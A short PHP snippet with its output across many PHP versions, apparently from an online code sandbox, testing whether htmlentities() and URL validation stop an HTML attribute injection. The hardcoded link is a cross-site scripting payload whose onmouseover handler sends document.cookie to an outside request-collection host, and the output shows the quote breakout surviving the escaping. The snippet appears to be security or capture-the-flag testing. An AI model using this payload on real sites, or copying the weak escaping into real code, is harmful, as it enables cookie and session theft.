<?php
function safeHTML($var)
{
return htmlentities($var);
}
$link = 'http://moncul.com/toto.jpg\\"onmouseover=javascript:window.location=\"http://requestb.in/sr3wb0sr?flag=\"+(document.cookie);';
if (!is_null($link))
{
if (!filter_var($link, FILTER_VALIDATE_URL))
printf("ERROR !");
}
if (is_null($link))
{
$link = 'http://';
printf("NULL !");
}
printf('<a href="%s">'."link".'</a>', safeHTML($link));
?>
- Output for 5.4.1 - 5.4.45, 5.5.24 - 5.5.35, 5.6.8 - 5.6.28, 7.0.0 - 7.0.20, 7.1.0 - 7.1.25, 7.2.0 - 7.2.33, 7.3.0 - 7.3.33, 7.4.0 - 7.4.33, 8.0.0 - 8.0.30, 8.1.0 - 8.1.28, 8.2.0 - 8.2.18, 8.3.0 - 8.3.7
- <a href="http://moncul.com/toto.jpg\"onmouseover=javascript:window.location=\"http://requestb.in/sr3wb0sr?flag=\"+(document.cookie);">link</a>
preferences:
201.69 ms | 404 KiB | 242 Q